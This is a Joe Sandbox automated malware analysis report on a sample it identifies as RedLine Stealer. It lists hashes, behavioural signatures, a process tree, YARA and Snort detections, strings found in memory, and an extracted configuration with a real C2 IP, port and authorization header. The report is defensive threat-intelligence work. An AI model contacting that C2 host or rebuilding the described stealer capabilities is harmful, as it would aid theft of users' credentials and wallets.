Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:740246
MD5:76b726f03046fc48fcc93701c14a3894
SHA1:3f1dec6167f3e52c4a723095bff999aed31c71c3
SHA256:983b19f3d65f37400eeb404fd838e322041fc26335ed14e08d29addbb87fcea9
Tags:exe
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Writes to foreign memory regions
Tries to steal Crypto Currency Wallets
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains functionality to inject code into remote processes
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5840 cmdline: C:\Users\user\Desktop\file.exe MD5: 76B726F03046FC48FCC93701C14A3894)
    • conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • AppLaunch.exe (PID: 100032 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
    • WerFault.exe (PID: 100204 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 94748 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4408 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5840 -s 94748 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["194.110.203.100:32796"], "Bot Id": "711", "Message": "License Not Found", "Authorization Header": "24e3340d853c89cad1e25194559ee778"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.298695211.0000000000A23000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000000.00000000.295452062.0000000000A23000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000000.00000003.256237407.0000000000892000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                Click to see the 5 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.2.file.exe.9f0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.file.exe.9f0000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x2529c:$s5: delete[]
                  • 0x529f0:$pat14: , CommandLine:
                  • 0x4a6db:$v2_1: ListOfProcesses
                  • 0x4a46f:$v4_3: base64str
                  • 0x4b4fa:$v4_4: stringKey
                  • 0x48088:$v4_5: BytesToStringConverted
                  • 0x470f0:$v4_6: FromBase64
                  • 0x4885c:$v4_8: procName
                  • 0x48bdf:$v5_1: DownloadAndExecuteUpdate
                  • 0x4a37f:$v5_2: ITaskProcessor
                  • 0x48bcd:$v5_3: CommandLineUpdate
                  • 0x48bbe:$v5_4: DownloadUpdate
                  • 0x49273:$v5_5: FileScanning
                  • 0x483f7:$v5_7: RecordHeaderField
                  • 0x47e16:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                  0.3.file.exe.890000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    0.3.file.exe.890000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                    • 0x21070:$pat14: , CommandLine:
                    • 0x18d5b:$v2_1: ListOfProcesses
                    • 0x18aef:$v4_3: base64str
                    • 0x19b7a:$v4_4: stringKey
                    • 0x16708:$v4_5: BytesToStringConverted
                    • 0x15770:$v4_6: FromBase64
                    • 0x16edc:$v4_8: procName
                    • 0x1725f:$v5_1: DownloadAndExecuteUpdate
                    • 0x189ff:$v5_2: ITaskProcessor
                    • 0x1724d:$v5_3: CommandLineUpdate
                    • 0x1723e:$v5_4: DownloadUpdate
                    • 0x178f3:$v5_5: FileScanning
                    • 0x16a77:$v5_7: RecordHeaderField
                    • 0x16496:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                    0.2.file.exe.a22780.1.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Snort Signatures

                      Timestamp:192.168.2.6194.110.203.10049721327962850027 11/07/22-20:02:48.733611
                      SID:2850027
                      Source Port:49721
                      Destination Port:32796
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:194.110.203.100192.168.2.632796497212850353 11/07/22-20:02:51.076682
                      SID:2850353
                      Source Port:32796
                      Destination Port:49721
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:192.168.2.6194.110.203.10049721327962850286 11/07/22-20:03:07.287990
                      SID:2850286
                      Source Port:49721
                      Destination Port:32796
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: file.exeVirustotal: Detection: 35%Perma Link
                      Machine Learning detection for sample
                      Source: file.exeJoe Sandbox ML: detected
                      Source: 0.3.file.exe.890000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["194.110.203.100:32796"], "Bot Id": "711", "Message": "License Not Found", "Authorization Header": "24e3340d853c89cad1e25194559ee778"}
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0B794 FindFirstFileExW,0_2_00A0B794
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_0A319998
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 0A318AC8h2_2_0A318930
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 0A318AC8h2_2_0A318927
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 0A314D92h2_2_0A314962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 0A315212h2_2_0A314962
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 0A314113h2_2_0A313EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 0A317FFEh2_2_0A317FE6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 4x nop then jmp 0A3130B3h2_2_0A312DC8

                      Networking

                      barindex
                      Snort IDS alert for network traffic
                      Source: TrafficSnort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.6:49721 -> 194.110.203.100:32796
                      Source: TrafficSnort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.6:49721 -> 194.110.203.100:32796
                      Source: TrafficSnort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 194.110.203.100:32796 -> 192.168.2.6:49721
                      Connects to many ports of the same IP (likely port scanning)
                      Source: global trafficTCP traffic: 194.110.203.100 ports 2,3,32796,6,7,9
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 194.110.203.100:32796
                      Source: Joe Sandbox ViewASN Name: KMBBANK-ASRU KMBBANK-ASRU
                      Source: Joe Sandbox ViewIP Address: 194.110.203.100 194.110.203.100
                      Source: global trafficTCP traffic: 192.168.2.6:49721 -> 194.110.203.100:32796
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faulth
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: AppLaunch.exe, 00000002.00000002.358247423.0000000007453000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: AppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: AppLaunch.exe, 00000002.00000002.360684678.000000000768F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.357962850.00000000073C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
